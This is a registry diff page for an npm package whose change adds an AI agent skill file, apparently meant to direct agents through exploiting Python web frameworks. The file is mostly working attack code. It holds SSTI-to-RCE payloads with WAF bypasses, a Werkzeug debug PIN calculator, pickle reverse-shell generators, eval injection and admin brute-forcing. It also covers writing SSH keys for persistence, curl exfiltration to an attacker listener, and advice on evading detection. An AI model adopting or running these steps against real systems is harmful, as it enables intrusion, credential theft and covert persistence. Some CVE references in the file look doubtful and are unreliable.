npm - rtexit-method - Versions diffs - 0.1.0 → 0.1.2 - Mend

rtexit-method 0.1.0 → 0.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (224) hide show

package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md ADDED Viewed

@@ -0,0 +1,986 @@
+---
+name: rt-exploit-python
+description: "Python web framework exploitation skill. Covers Jinja2/Mako SSTI (Server-Side Template Injection) to RCE, Django SSTI and admin panel exploitation, Flask debug console exploitation, Python pickle deserialization RCE, and Python eval/exec injection. Targets Django, Flask, FastAPI, Tornado applications."
+---
+# rt-exploit-python — Python Web Framework Exploitation
+## 1. Overview and When to Use
+This skill covers exploitation of Python-based web frameworks including Django, Flask, FastAPI, and Tornado. The primary attack vectors are:
+- **SSTI (Server-Side Template Injection)** — Jinja2, Mako, Tornado templates processed with unsanitized user input
+- **Flask Debug Console** — Werkzeug interactive debugger exposed in production with PIN bypass
+- **Django Admin Panel** — Default `/admin/` with weak credentials or SSTI in custom templates
+- **Python Pickle Deserialization** — Unsafe `pickle.loads()` on attacker-controlled data
+- **eval/exec Injection** — Dynamic code execution sinks receiving user input
+**When to use this skill:**
+- Target is running a Python web application (confirmed via headers, error pages, or recon)
+- You observe template syntax reflected in responses (`{{7*7}}` → `49`)
+- Error pages reveal Werkzeug/Django debug stack traces
+- You find endpoints accepting serialized data (cookies, API payloads)
+- Admin panels are exposed with default or brute-forceable credentials
+- Source code review reveals unsafe `eval()`, `exec()`, or `pickle.loads()` calls
+---
+## 2. Prerequisites and Setup
+### Tools Required
+```bash
+# Core tools
+pip install tplmap           # SSTI detection and exploitation framework
+pip install requests         # HTTP client for manual exploitation
+pip install pwntools          # Payload crafting and shellcode
+# Optional but recommended
+pip install flask             # Local testing environment
+pip install django            # Django payload testing
+# System tools
+which python3
+which curl
+which nc                      # netcat for reverse shells
+which burpsuite               # Proxy for request manipulation
+```
+### Environment Setup
+```bash
+# Set up isolated workspace
+mkdir -p ~/rt-python-exploit/{payloads,loot,logs}
+cd ~/rt-python-exploit
+# Configure proxy if using Burp Suite
+export HTTP_PROXY="http://127.0.0.1:8080"
+export HTTPS_PROXY="http://127.0.0.1:8080"
+# Listener for reverse shells
+nc -lvnp 4444 &
+# Clone useful wordlists
+git clone https://github.com/danielmiessler/SecLists /opt/SecLists
+```
+### Identify Python Framework
+```bash
+# Check response headers
+curl -si https://target.com/ | grep -i "server\|x-powered\|x-django\|werkzeug"
+# Common indicators:
+# Server: Werkzeug/2.x.x Python/3.x.x  → Flask
+# X-Frame-Options: DENY + CSRF middleware → Django
+# Error pages with Jinja2 tracebacks → Flask/Jinja2
+# /admin/ with "Django administration" → Django
+# Check for debug endpoints
+curl -si https://target.com/console      # Werkzeug debug console
+curl -si https://target.com/__debug__    # Django debug toolbar
+curl -si https://target.com/debug        # Generic debug endpoint
+```
+---
+## 3. Skill Levels
+### BEGINNER — Detection and Basic Injection
+```bash
+# 1. Detect SSTI with math expression
+curl "https://target.com/page?name={{7*7}}"
+# Expected vulnerable response: 49 (not {{7*7}})
+# 2. Detect Jinja2 vs Mako vs Tornado
+curl "https://target.com/search?q={{7*'7'}}"
+# Jinja2 result: 7777777
+# Twig result:   49
+# Not vulnerable: {{7*'7'}}
+# 3. Run tplmap for automated detection
+python3 tplmap.py -u "https://target.com/page?name=test"
+# 4. Check for Flask debug mode
+curl -si "https://target.com/console" | grep "Werkzeug"
+```
+### INTERMEDIATE — SSTI to RCE, Admin Access
+```bash
+# 1. Read /etc/passwd via SSTI
+curl "https://target.com/page?name={{request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd').read()}}"
+# 2. Django admin brute force
+hydra -L /opt/SecLists/Usernames/top-usernames-shortlist.txt \
+      -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt \
+      target.com http-post-form "/admin/login/:username=^USER^&password=^PASS^&csrfmiddlewaretoken=TOKEN:Please enter"
+# 3. tplmap with OS command
+python3 tplmap.py -u "https://target.com/page?name=test" --os-cmd "id"
+# 4. Flask debug PIN calculation (see Section 5)
+python3 flask_pin_calc.py --machine-id /proc/sys/kernel/random/boot_id --mac 02:42:ac:11:00:02
+```
+### ADVANCED — Sandbox Escape, Pickle RCE
+```bash
+# 1. Jinja2 sandbox escape via MRO traversal
+curl "https://target.com/page?name={{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}"
+# 2. Generate pickle RCE payload
+python3 -c "
+import pickle, os, base64
+class Exploit(object):
+    def __reduce__(self):
+        return (os.system, ('bash -c \"bash -i >& /dev/tcp/10.10.14.1/4444 0>&1\"',))
+print(base64.b64encode(pickle.dumps(Exploit())).decode())
+"
+# 3. Bypass Jinja2 restrictions with attr filter
+curl "https://target.com/?x={{''.attr('__class__').attr('__mro__')[1].attr('__subclasses__')()[104].attr('__init__').attr('__globals__')['popen']('id').read()}}"
+# 4. FastAPI SSTI via Jinja2 custom template
+curl -X POST "https://target.com/render" \
+  -H "Content-Type: application/json" \
+  -d '{"template": "{{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}"}'
+```
+### EXPERT — Chained Attacks, Full Compromise
+```bash
+# 1. SSTI → write SSH key → persistent access
+PAYLOAD='{{request.application.__globals__.__builtins__.__import__("os").popen("echo ssh-rsa AAAA...KEY... >> /root/.ssh/authorized_keys").read()}}'
+curl -G "https://target.com/page" --data-urlencode "name=$PAYLOAD"
+# 2. Pickle via JWT with alg=none bypass
+python3 jwt_pickle_exploit.py --target https://target.com/api/profile \
+  --lhost 10.10.14.1 --lport 4444
+# 3. Django admin → file manager plugin → webshell
+# After admin login, abuse Django FileField or custom admin actions
+curl -X POST "https://target.com/admin/app/userprofile/upload/" \
+  -b "sessionid=STOLEN_SESSION; csrftoken=TOKEN" \
+  -F "file=@shell.py"
+# 4. Mako SSTI (different syntax)
+curl "https://target.com/page?name=\${__import__('os').popen('id').read()}"
+```
+---
+## 4. Step-by-Step Workflow
+### Phase 1: Reconnaissance and Framework Fingerprinting
+```
+1. Identify Python application via headers/error pages
+2. Enumerate endpoints: /admin/, /api/, /debug/, /console/
+3. Identify template engine (Jinja2, Mako, Tornado, Django templates)
+4. Map input vectors: GET/POST params, headers, cookies, JSON fields
+5. Review JavaScript source for API endpoints and parameter names
+```
+### Phase 2: SSTI Detection
+```
+1. Inject detection polyglot into all input vectors
+2. Confirm injection with math expression {{7*7}} → 49
+3. Fingerprint engine with {{7*'7'}} vs ${7*7} vs #{7*7}
+4. Test in headers: X-Forwarded-For, User-Agent, Referer
+5. Test in JSON bodies, XML payloads, file upload filenames
+```
+### Phase 3: Exploitation Path Selection
+```
+1. If SSTI confirmed → proceed to RCE via MRO traversal or globals
+2. If debug console found → calculate/bypass PIN
+3. If admin panel exposed → credential attack → authenticated exploitation
+4. If serialization endpoint found → generate pickle payload
+5. If source code available → grep for eval/exec/pickle sinks
+```
+### Phase 4: RCE Achievement
+```
+1. Execute id, whoami to confirm code execution
+2. Read /etc/passwd, /proc/version for system fingerprinting
+3. Check sudo -l for privilege escalation paths
+4. Establish reverse shell or write webshell
+5. Dump environment variables (may contain secrets, DB creds)
+```
+### Phase 5: Post-Exploitation
+```
+1. Dump Django settings.py (SECRET_KEY, DATABASE settings)
+2. Extract database credentials and dump user tables
+3. Collect API keys from environment variables
+4. Establish persistence (SSH keys, cron, systemd service)
+5. Document all findings with timestamps and screenshots
+```
+---
+## 5. Payload Examples with Explanations
+### 5.1 Jinja2 SSTI Detection Chain
+```python
+# Step 1: Basic math — confirms template execution
+{{7*7}}
+# Returns: 49
+# Step 2: String multiplication — fingerprints Jinja2 specifically
+{{7*'7'}}
+# Jinja2 returns: 7777777
+# Python eval would return: TypeError
+# Step 3: Config object access — Jinja2/Flask specific
+{{config}}
+# Returns Flask config dict including SECRET_KEY
+# Step 4: Self object (Flask)
+{{self.__dict__}}
+# Returns internal object attributes
+```
+### 5.2 Jinja2 to RCE via MRO (Method Resolution Order)
+```python
+# Full payload — explained line by line:
+{{''.__class__.__mro__[1].__subclasses__()}}
+# ''         → empty string object
+# .__class__ → str class
+# .__mro__   → [str, object] — Method Resolution Order
+# [1]        → object (base Python class)
+# .__subclasses__() → ALL subclasses of object in memory
+# Find index of subprocess.Popen or file class:
+{{''.__class__.__mro__[1].__subclasses__() | join(',')}}
+# After finding index (e.g., 245 for subprocess.Popen):
+{{''.__class__.__mro__[1].__subclasses__()[245]('id',shell=True,stdout=-1).communicate()[0].strip()}}
+# Alternative: os.popen via __builtins__
+{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
+# request.application → Flask app object
+# .__globals__        → module-level globals
+# .__builtins__       → Python built-ins dict
+# .__import__('os')   → import the os module
+# .popen('id').read() → execute command, read output
+```
+### 5.3 Jinja2 Sandbox Escape Techniques
+```python
+# Technique 1: Using lipsum global (Flask/Jinja2)
+{{lipsum.__globals__["os"].popen("id").read()}}
+# lipsum is a Jinja2 global that has access to Python globals
+# Technique 2: Using url_for global
+{{url_for.__globals__["os"].popen("id").read()}}
+# Technique 3: Using get_flashed_messages
+{{get_flashed_messages.__globals__["os"].popen("id").read()}}
+# Technique 4: Using cycler (Jinja2 extension)
+{{cycler.__init__.__globals__.os.popen("id").read()}}
+# Technique 5: attr filter bypass (WAF evasion)
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+# \x5f = underscore — bypasses WAF rules filtering "__"
+```
+### 5.4 Flask Debug Console PIN Bypass
+```python
+# Flask/Werkzeug debug console is at /console
+# Protected by PIN — can be calculated if you have RCE or LFI
+# PIN calculation requires (read via LFI or partial SSTI):
+# 1. /etc/machine-id OR /proc/sys/kernel/random/boot_id
+# 2. MAC address from /proc/net/arp or /sys/class/net/eth0/address
+# 3. App's __name__ and module path (from error page tracebacks)
+python3 << 'EOF'
+import hashlib
+import itertools
+# Values gathered from target
+username = "www-data"             # Process owner (from /proc/self/status or ps)
+modname = "flask.app"            # Always flask.app for Flask apps
+appname = "wsgi_app"             # Flask app object name (from error page)
+flask_path = "/usr/local/lib/python3.9/dist-packages/flask/app.py"  # From traceback
+node_uuid = "0242ac110002"       # MAC address without colons (from /proc/net/arp)
+machine_id = "a4ecc671-3bc7-4b0c-b7b0-a7e93df44e5a"  # /etc/machine-id
+# Build the hash
+h = hashlib.md5()
+for val in [username, modname, appname, flask_path, node_uuid, machine_id]:
+    h.update(val.encode("utf-8") + b"\n")
+# Generate PIN
+num = int(h.hexdigest(), 16)
+rv = None
+for group_size in 5, 4, 3:
+    if len(str(num)) % group_size == 0:
+        rv = "-".join(
+            itertools.islice(iter(lambda i=iter(str(num)): "".join([next(i)] * group_size), None), None)
+        )
+        break
+print(f"Calculated PIN: {rv}")
+EOF
+# Once you have the PIN, access the console:
+# Navigate to: https://target.com/console
+# Enter PIN → interactive Python REPL → execute arbitrary code
+```
+### 5.5 Python Pickle Deserialization RCE
+```python
+# Pickle RCE — __reduce__ method is called during deserialization
+import pickle
+import os
+import base64
+# Basic reverse shell payload
+class ReverseShell(object):
+    def __init__(self, lhost, lport):
+        self.lhost = lhost
+        self.lport = lport
+    def __reduce__(self):
+        cmd = f"bash -c 'bash -i >& /dev/tcp/{self.lhost}/{self.lport} 0>&1'"
+        return (os.system, (cmd,))
+# Generate and base64-encode payload
+payload = ReverseShell("10.10.14.1", 4444)
+encoded = base64.b64encode(pickle.dumps(payload)).decode()
+print(f"Payload: {encoded}")
+# Delivery methods:
+# 1. Cookie: Set-Cookie: session=<base64_payload>
+# 2. POST body: data=<url_encoded_base64_payload>
+# 3. File upload: upload pickle file, trigger deserialization
+# Send payload
+import requests
+cookies = {"session": encoded}
+r = requests.get("https://target.com/profile", cookies=cookies)
+# Alternative — command execution without reverse shell (for blind scenarios)
+class CmdExec(object):
+    def __reduce__(self):
+        return (os.popen, ("curl http://10.10.14.1:8080/$(whoami)",))
+```
+### 5.6 Django SSTI (Custom Templates)
+```python
+# Django's default template engine does NOT execute arbitrary Python
+# However, custom tags or Jinja2 as Django's backend enables SSTI
+# If Django configured with Jinja2 backend (settings.py TEMPLATES backend):
+# Same Jinja2 payloads apply
+# Django-specific: template filter injection
+# If user input is rendered as: {{ user_input | safe }}
+# And custom template tag calls eval():
+# Django settings.py disclosure via SSTI (if Jinja2 backend):
+{{settings.SECRET_KEY}}
+{{settings.DATABASES}}
+{{settings.AWS_ACCESS_KEY_ID}}
+# Read Django settings via os.environ:
+{{request.application.__globals__.__builtins__.__import__('os').environ['DJANGO_SECRET_KEY']}}
+```
+### 5.7 Mako Template SSTI
+```python
+# Mako uses ${} for expressions and <%> for code blocks
+# Pyramid, some Flask apps use Mako
+# Basic detection
+${7*7}           # Returns 49
+${7*'7'}         # Returns 7777777
+# Direct code execution (no sandbox in Mako by default)
+${__import__('os').popen('id').read()}
+# Multi-line code block
+<%
+import os
+x = os.popen('cat /etc/passwd').read()
+%>
+${x}
+# With request context in Pyramid:
+${request.environ}
+```
+### 5.8 eval/exec Injection
+```python
+# Grep for dangerous sinks in source code (if available):
+# grep -r "eval(" app/ --include="*.py"
+# grep -r "exec(" app/ --include="*.py"
+# grep -r "compile(" app/ --include="*.py"
+# Example vulnerable code:
+# result = eval(request.args.get('expr'))
+# Payload progression:
+# Detection:
+expr=7+7                          # Returns 14
+# OS command:
+expr=__import__('os').popen('id').read()
+# Reverse shell:
+expr=__import__('os').system('bash+-c+"bash+-i+>&+/dev/tcp/10.10.14.1/4444+0>&1"')
+# Bypass quote filtering:
+expr=__import__('os').popen(chr(105)+chr(100)).read()   # 'id' via chr()
+```
+---
+## 6. Tool Commands with Flags Explained
+### tplmap
+```bash
+# Basic scan
+python3 tplmap.py -u "https://target.com/page?name=test"
+# -u    URL with injection point marked by asterisk or autodetected
+# Specify injection point explicitly
+python3 tplmap.py -u "https://target.com/page?name=test*"
+# *     Marks exact injection point within parameter value
+# POST request
+python3 tplmap.py -u "https://target.com/search" \
+  -d "query=test" \
+  -X POST
+# -d    POST data
+# -X    HTTP method
+# Specify template engine (skip detection)
+python3 tplmap.py -u "https://target.com/page?name=test" \
+  --engine Jinja2
+# --engine   Force specific engine (Jinja2, Mako, Twig, Tornado, etc.)
+# Execute OS command
+python3 tplmap.py -u "https://target.com/page?name=test" \
+  --os-cmd "cat /etc/passwd"
+# --os-cmd   Execute system command through SSTI
+# Reverse shell
+python3 tplmap.py -u "https://target.com/page?name=test" \
+  --os-shell
+# --os-shell  Interactive shell through template injection
+# Bind shell
+python3 tplmap.py -u "https://target.com/page?name=test" \
+  --bind-shell 4444
+# --bind-shell  Open bind shell on target port
+# Upload file
+python3 tplmap.py -u "https://target.com/page?name=test" \
+  --upload /tmp/shell.py /var/www/html/shell.py
+# --upload  Upload local file to remote path
+# Custom headers
+python3 tplmap.py -u "https://target.com/page" \
+  -H "X-Forwarded-For: test" \
+  -H "Authorization: Bearer TOKEN"
+# -H    Add custom headers (test headers for SSTI too)
+# Through Burp proxy
+python3 tplmap.py -u "https://target.com/page?name=test" \
+  --proxy http://127.0.0.1:8080
+# --proxy  Route through Burp/MITM proxy
+# Cookies
+python3 tplmap.py -u "https://target.com/page" \
+  --cookie "session=eyJ...; csrftoken=ABC"
+# --cookie  Include session cookies
+```
+### curl for Manual Exploitation
+```bash
+# URL-encoded SSTI payload
+curl -G "https://target.com/page" \
+  --data-urlencode "name={{config}}" \
+  -b "sessionid=XXXX" \
+  -H "User-Agent: Mozilla/5.0" \
+  -k -s
+# -G              Send as GET request with --data as query string
+# --data-urlencode  URL-encode the value
+# -b              Cookie header
+# -k              Skip TLS verification
+# -s              Silent mode
+# POST with JSON payload
+curl -X POST "https://target.com/api/render" \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer TOKEN" \
+  -d '{"template": "{{7*7}}"}' \
+  -v
+# -v    Verbose — shows full request/response headers
+# Follow redirects and save response
+curl -L "https://target.com/page?name={{7*7}}" \
+  -o response.html \
+  -c cookies.txt \
+  -b cookies.txt
+# -L    Follow redirects
+# -o    Save output to file
+# -c    Save cookies to file
+# -b    Read cookies from file
+```
+### Hydra for Django Admin Brute Force
+```bash
+# Django admin login brute force
+hydra -l admin \
+  -P /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt \
+  target.com \
+  http-post-form \
+  "/admin/login/:username=^USER^&password=^PASS^&csrfmiddlewaretoken=STATIC_TOKEN:Please enter the correct"
+# -l          Single username
+# -P          Password wordlist
+# http-post-form  POST form attack module
+# /path/:data:fail_string  Path, form data, failure string
+# With CSRF token (requires manual extraction first):
+# 1. GET /admin/login/ → extract csrfmiddlewaretoken from HTML
+# 2. Include static token in hydra command (valid for session)
+# Better: use Burp Intruder for CSRF-protected forms
+# Multiple usernames
+hydra -L /opt/SecLists/Usernames/top-usernames-shortlist.txt \
+  -P /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
+  -t 4 \
+  target.com \
+  http-post-form \
+  "/admin/login/:username=^USER^&password=^PASS^&csrfmiddlewaretoken=TOKEN:errornote"
+# -t 4    4 parallel threads (Django rate limits aggressively, keep low)
+```
+### Python Exploit Scripts
+```bash
+# Pickle payload generator
+python3 -c "
+import pickle, os, base64, sys
+cmd = sys.argv[1] if len(sys.argv) > 1 else 'id'
+class E:
+    def __reduce__(self): return os.system, (cmd,)
+print(base64.b64encode(pickle.dumps(E())).decode())
+" "bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'"
+# Test pickle locally before sending
+python3 -c "
+import pickle, base64
+payload = 'YOUR_BASE64_PAYLOAD_HERE'
+pickle.loads(base64.b64decode(payload))  # Will execute locally for testing
+"
+```
+---
+## 7. Real-World Attack Scenarios
+### Scenario 1: Flask App with SSTI in Email Template Feature
+**Context:** E-commerce platform allows customers to customize order confirmation email templates. The feature uses Jinja2 and renders user-supplied template strings server-side.
+**Reconnaissance:**
+```bash
+# Discover the feature endpoint
+curl -s "https://shop.target.com/account/email-template" -b "session=TOKEN"
+# Response includes textarea for template customization
+# Test SSTI
+curl -X POST "https://shop.target.com/account/email-template/preview" \
+  -H "Content-Type: application/x-www-form-urlencoded" \
+  -b "session=TOKEN; csrftoken=CSRF" \
+  -d "template={{7*7}}&csrfmiddlewaretoken=CSRF"
+# Response: "49" confirms SSTI
+```
+**Exploitation:**
+```bash
+# Step 1: Confirm RCE
+curl -X POST "https://shop.target.com/account/email-template/preview" \
+  -b "session=TOKEN; csrftoken=CSRF" \
+  --data-urlencode "template={{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}" \
+  --data "csrfmiddlewaretoken=CSRF"
+# Response: "uid=33(www-data) gid=33(www-data)"
+# Step 2: Dump Flask config (SECRET_KEY for session forgery)
+curl -X POST "https://shop.target.com/account/email-template/preview" \
+  -b "session=TOKEN; csrftoken=CSRF" \
+  --data-urlencode "template={{config}}" \
+  --data "csrfmiddlewaretoken=CSRF"
+# Response: Config dict with SECRET_KEY exposed
+# Step 3: Dump environment variables (cloud credentials)
+PAYLOAD="{{request.application.__globals__.__builtins__.__import__('os').environ}}"
+# Look for: AWS_ACCESS_KEY_ID, DATABASE_URL, STRIPE_SECRET_KEY
+# Step 4: Reverse shell
+PAYLOAD="{{request.application.__globals__.__builtins__.__import__('os').popen('bash -c \"bash -i >& /dev/tcp/10.10.14.1/4444 0>&1\"').read()}}"
+# Step 5: Forge admin session with SECRET_KEY
+pip install flask-unsign
+flask-unsign --sign --secret 'LEAKED_SECRET_KEY' \
+  --cookie '{"user_id": 1, "role": "admin"}'
+```
+**Impact:** Full RCE, session forgery, credential exposure, lateral movement to cloud infrastructure.
+---
+### Scenario 2: Django App Debug Mode Exposed in Production
+**Context:** Django application accidentally deployed with `DEBUG=True`. Werkzeug debug console accessible at `/console`. Target is a healthcare portal.
+**Reconnaissance:**
+```bash
+# Discover debug console
+curl -si "https://portal.target.com/console" | head -20
+# Response: HTTP 200, "Werkzeug Debugger" in body
+# Get machine info from debug error pages to calculate PIN
+# Trigger a deliberate 500 error
+curl "https://portal.target.com/?x={{UNDEFINED}}"
+# Error page reveals: Python version, app path, module structure
+# Alternatively, check if LFI exists elsewhere to read system files
+curl "https://portal.target.com/static/../../../etc/machine-id"
+```
+**PIN Calculation:**
+```bash
+# Gather required values from error pages and recon:
+# - username: www-data (from error page or ps aux via LFI)
+# - flask_path: /usr/local/lib/python3.9/site-packages/flask/app.py
+# - MAC: from /proc/net/arp or /sys/class/net/eth0/address
+# - machine-id: from /etc/machine-id via LFI
+python3 pin_calculator.py \
+  --username www-data \
+  --flask-path /usr/local/lib/python3.9/site-packages/flask/app.py \
+  --mac 02:42:c0:a8:01:05 \
+  --machine-id "b3d29d72-5c3f-4b2e-b1a3-abc123def456"
+# Output: Calculated PIN: 123-456-789
+# Enter PIN at /console → Python REPL
+# Execute in console:
+import os; os.popen('cat /etc/passwd').read()
+import subprocess; subprocess.check_output(['find', '/home', '-name', '*.py'])
+# Django database dump
+import django
+os.environ['DJANGO_SETTINGS_MODULE'] = 'app.settings'
+from django.contrib.auth.models import User
+[(u.username, u.password) for u in User.objects.all()]
+```
+**Impact:** Complete server compromise, database access, user credential extraction, patient data exposure.
+---
+### Scenario 3: FastAPI Endpoint with Pickle Deserialization
+**Context:** Internal API gateway uses Python pickle to cache user preferences in Redis. An exposed API endpoint accepts base64-encoded "preferences" parameter that gets deserialized.
+**Reconnaissance:**
+```bash
+# Identify API structure
+curl "https://api.target.com/docs"  # FastAPI auto-generates /docs
+curl "https://api.target.com/openapi.json"  # OpenAPI spec
+# Find preferences endpoint
+curl "https://api.target.com/user/preferences" \
+  -H "Authorization: Bearer VALID_TOKEN"
+# Response: {"preferences": "gASVA...BASE64..."}
+# gASV is base64 of pickle magic bytes \x80\x04\x95
+# Confirm pickle by decoding response
+python3 -c "
+import base64, pickle
+data = 'gASVA...BASE64...'
+prefs = pickle.loads(base64.b64decode(data))
+print(type(prefs), prefs)
+"
+```
+**Exploitation:**
+```bash
+# Step 1: Generate malicious pickle payload
+python3 << 'EOF'
+import pickle, os, base64
+class RCE(object):
+    def __reduce__(self):
+        # Write SSH public key for persistence
+        cmd = "mkdir -p /root/.ssh && echo 'ssh-rsa AAAA...PUBKEY...' >> /root/.ssh/authorized_keys"
+        return (os.system, (cmd,))
+payload = base64.b64encode(pickle.dumps(RCE())).decode()
+print(f"Malicious payload: {payload}")
+EOF
+# Step 2: Submit malicious payload
+curl -X PUT "https://api.target.com/user/preferences" \
+  -H "Authorization: Bearer VALID_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d "{\"preferences\": \"MALICIOUS_BASE64_PAYLOAD\"}"
+# Step 3: Trigger deserialization
+curl "https://api.target.com/user/preferences" \
+  -H "Authorization: Bearer VALID_TOKEN"
+# Server deserializes the payload → SSH key written → persistent access
+# Step 4: Connect with SSH
+ssh -i ~/.ssh/id_rsa root@api.target.com
+# Alternative — reverse shell via curl exfil (blind)
+python3 << 'EOF'
+import pickle, os, base64
+class BlindRCE(object):
+    def __reduce__(self):
+        cmd = "curl http://10.10.14.1:8080/$(cat /etc/hostname | base64 -w0)"
+        return (os.system, (cmd,))
+print(base64.b64encode(pickle.dumps(BlindRCE())).decode())
+EOF
+# Start listener: python3 -m http.server 8080
+# Receive request with base64-encoded hostname → confirms RCE
+```
+**Impact:** Unauthenticated RCE via authenticated API endpoint, persistent root access, supply chain risk if internal API used by other services.
+---
+## 8. Detection and OPSEC Considerations
+### Detection Risks
+```
+HIGH DETECTION RISK:
+- Automated tplmap scans generate distinctive HTTP patterns
+- Failed SSTI attempts create 500 errors logged server-side
+- Reverse shell connections appear in netflow/firewall logs
+- Django admin brute force triggers account lockouts and WAF alerts
+MEDIUM DETECTION RISK:
+- Manual SSTI testing with math payloads ({{7*7}})
+- Reading system files (/etc/passwd) — may trigger EDR/file audit
+- Django admin login from unusual IP/geolocation
+LOW DETECTION RISK:
+- Initial framework fingerprinting via headers
+- Reviewing publicly exposed /docs, /api/schema endpoints
+```
+### OPSEC Techniques
+```bash
+# 1. Route through proxy/VPN — never use direct attacker IP
+export HTTP_PROXY="http://PROXY_IP:PORT"
+# 2. Slow down requests to avoid rate limiting
+# Use --delay in tplmap, add sleep between manual requests
+# 3. Use innocuous-looking payloads first
+# {{7*7}} is far less suspicious than __import__('os')
+# Build up slowly: detect → confirm → exploit
+# 4. Avoid noisy tools on production systems
+# Manual curl > automated scanners during active engagements
+# 5. Clean up after yourself
+# Remove uploaded webshells, authorized_keys entries
+# Restore original configuration if modified
+# 6. Use existing process names for spawned shells
+# Name your nc listener process to match existing services
+bash -c 'exec -a "apache2" bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'
+# 7. Encode payloads to evade WAF/IDS
+# Base64 encode command strings:
+python3 -c "import base64; print(base64.b64encode(b'id').decode())"
+# Payload: {{request.application.__globals__.__builtins__.__import__('base64').b64decode('aWQ=').decode()}}
+# Then pipe through: {{...popen(base64.b64decode('aWQ=').decode()).read()}}
+# 8. WAF bypass techniques
+# Use URL encoding: %7B%7B7*7%7D%7D
+# Use Unicode: {{7*7}}
+# Split payload across multiple parameters if concatenated server-side
+# Use Jinja2 filters as alternative syntax: {{7|string}} vs {{7}}
+```
+### Indicators of Compromise (IOC) — What Blue Team Looks For
+```
+- HTTP 500 responses with Jinja2/Python tracebacks in logs
+- Requests containing: __class__, __mro__, __subclasses__, __globals__
+- Requests containing: popen, subprocess, os.system, __import__
+- Unusual outbound connections from web server process
+- New entries in /root/.ssh/authorized_keys
+- Cron jobs or systemd services created by www-data
+- High volume POST requests to same endpoint (brute force)
+```
+---
+## 9. Output and Documentation
+### Capturing Evidence
+```bash
+# All commands — save output with timestamps
+exec > >(tee -a ~/rt-python-exploit/logs/session-$(date +%Y%m%d-%H%M%S).log) 2>&1
+# Screenshot tool output
+tplmap.py ... 2>&1 | tee ~/rt-python-exploit/logs/tplmap-$(date +%s).txt
+# Save all HTTP responses
+curl ... -D ~/rt-python-exploit/logs/headers-$(date +%s).txt \
+         -o ~/rt-python-exploit/logs/response-$(date +%s).html
+# Document RCE proof
+curl "https://target.com/page?name={{...id_payload...}}" \
+  -o ~/rt-python-exploit/loot/rce-proof-$(date +%s).txt
+# Capture loot
+# - /etc/passwd, /etc/shadow
+# - Django SECRET_KEY
+# - Database credentials (settings.py, DATABASE_URL env var)
+# - API keys from environment
+# - SSH private keys in /home/*/.ssh/
+```
+### Finding Documentation Template
+```markdown
+## Finding: Server-Side Template Injection (SSTI) → RCE
+**Severity:** Critical
+**CVSS:** 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
+**URL:** https://target.com/page?name=[PAYLOAD]
+**Parameter:** name (GET)
+**Template Engine:** Jinja2
+**Framework:** Flask 2.3.1 / Python 3.9.7
+**Proof of Concept:**
+Request:  GET /page?name={{7*7}}
+Response: 49
+**RCE Payload:**
+{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
+**RCE Output:**
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+**Business Impact:**
+Full remote code execution on web server. Attacker can read/write all files,
+establish persistence, pivot to internal network, and exfiltrate customer data.
+**Remediation:**
+- Never render user-supplied strings as Jinja2 templates
+- Use template.render(user_data=value) — pass data as variables, not template strings
+- Enable Jinja2 sandbox: SandboxedEnvironment() — note this can be bypassed
+- Implement strict input validation and WAF rules for template syntax
+```
+---
+## 10. Resources
+### Official Documentation
+- Jinja2 Sandbox: https://jinja.palletsprojects.com/en/3.1.x/sandbox/
+- Django Security: https://docs.djangoproject.com/en/4.2/topics/security/
+- Werkzeug Debugger: https://werkzeug.palletsprojects.com/en/2.3.x/debug/
+### Research and Exploit Databases
+- PayloadsAllTheThings SSTI: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
+- HackTricks SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
+- HackTricks Pickle: https://book.hacktricks.xyz/pentesting-web/deserialization#pickle
+- PortSwigger SSTI: https://portswigger.net/web-security/server-side-template-injection
+### Tools
+- tplmap (SSTI scanner/exploiter): https://github.com/epinna/tplmap
+- flask-unsign (Flask session forgery): https://github.com/Paradoxis/Flask-Unsign
+- fickling (pickle analysis): https://github.com/trailofbits/fickling
+- Burp Suite SSTI extensions: https://github.com/portswigger/server-side-template-injection
+### Wordlists
+- SecLists SSTI payloads: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/Server-Side-Template-Injection
+- FuzzDB SSTI: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/server-side-inject
+### CTF Writeups and Research
+- Jinja2 sandbox escape research: https://github.com/0x09AL/jinja2-sandbox-escape
+- Flask PIN bypass research: https://www.bengrewell.com/cracking-flask-werkzeug-debugger-pin
+- Pickle exploitation deep dive: https://checkmarx.com/blog/python-pickle-module-is-not-safe
+- Django SSTI scenarios: https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti
+### CVE References
+- CVE-2019-8341 — Jinja2 SSTI in various products
+- CVE-2021-32762 — Django template injection variants
+- CVE-2022-24999 — Werkzeug debug PIN bypass conditions
+---
+## Quick Reference Card
+```
+DETECTION PAYLOADS:
+  {{7*7}}          → Jinja2/Twig/Mako (returns 49)
+  ${7*7}           → Mako/Tornado (returns 49)
+  #{7*7}           → Ruby ERB (different target)
+  {{7*'7'}}        → Jinja2=7777777, Twig=49
+JINJA2 QUICK RCE:
+  {{lipsum.__globals__["os"].popen("id").read()}}
